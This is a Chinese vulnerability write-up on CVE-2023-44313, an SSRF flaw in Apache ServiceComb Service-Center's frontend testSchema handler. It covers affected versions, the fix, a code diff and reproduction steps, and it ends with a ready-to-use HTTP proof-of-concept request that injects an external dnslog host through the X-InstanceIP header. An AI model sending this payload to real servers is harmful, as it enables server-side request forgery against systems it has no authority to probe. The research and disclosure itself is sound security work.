CVE-2023-44313 Apache ServiceComb Service-Center SSRF 漏洞研究

本次项目基于go语言(本人不精通),虽不是java web框架了 ,但搭建web服务的框架一些思想理念却是通用的,我们由此可以得到一些蛛丝马迹.......

目录

漏洞简介

漏洞分析

漏洞复现


漏洞简介

Apache ServiceComb Service-Center是Apache基金会的 一个基于 Restful 的服务注册中心,提供微服务发现和微服务管理。

在 ServiceComb Service-Center 中的 frontend 组件的契约测试功能存在SSRF漏洞,由于未验证请求instanceIP 参数,攻击者可构造恶意请求获取敏感服务器信息。

影响范围

Apache ServiceComb Service-Center < 2.2.0

安全版本

Apache ServiceComb Service-Center 2.2.0

解决建议

升级至安全版本及其以上

项目地址

GitHub - apache/servicecomb-service-center at a0e09e1f70e818d0bbc13f43238a876279808049

漏洞分析

定位文件frontend/schema/schemahandler.go

diff 比对修改添加的地方

两个版本都从header头中提取了参数 X-InstanceIP拼接http作为url,【左:2.1.0 右:2.2.0】

最后请求了该url,区别在于2.2.0版本 对X-InstanceIP做了函数检查。那这一定是漏洞触发点!

接下来思考! 如何进入路由处理函数?

搜索关键字 SchemaHandleFunc 寻找定义路由的地方

点进去查看

没错了就是我们想要的定义 现在开始构造payload进行漏洞复现

漏洞复现

下载源码 服务开起来

开启burp访问testSchema 路径 抓包

增加头部信息,打dnslog验证

X-InstanceIP: xxxx.dnslog.cn

查看dnslog状态

漏洞验证成功

参考阿里云漏洞库

附赠poc

复制代码
GET /testSchema/ HTTP/1.1
Host: 127.0.0.1:30103
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
X-InstanceIP: p5pcss.dnslog.cn
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
复制代码
相关推荐
秋邱5 分钟前
不仅是极速:从 CANN SHMEM 看 AIGC 集群通信的“安全微操”艺术
安全·aigc
初恋叫萱萱10 分钟前
CANN 生态安全加固指南:构建可信、鲁棒、可审计的边缘 AI 系统
人工智能·安全
JoySSLLian36 分钟前
手把手教你安装免费SSL证书(附宝塔/Nginx/Apache配置教程)
网络·人工智能·网络协议·tcp/ip·nginx·apache·ssl
麦聪聊数据1 小时前
为何通用堡垒机无法在数据库运维中实现精准风控?
数据库·sql·安全·低代码·架构
Apache Flink2 小时前
Apache Flink Agents 0.2.0 发布公告
大数据·flink·apache
m0_466525292 小时前
绿盟科技风云卫AI安全能力平台成果重磅发布
大数据·数据库·人工智能·安全
晚霞的不甘3 小时前
守护智能边界:CANN 的 AI 安全机制深度解析
人工智能·安全·语言模型·自然语言处理·前端框架
枷锁—sha3 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
数字护盾(和中)3 小时前
信创生态 + 国密算法 筑牢数字安全韧性根基
安全
devmoon4 小时前
在 Polkadot 上部署独立区块链Paseo 测试网实战部署指南
开发语言·安全·区块链·polkadot·erc-20·测试网·独立链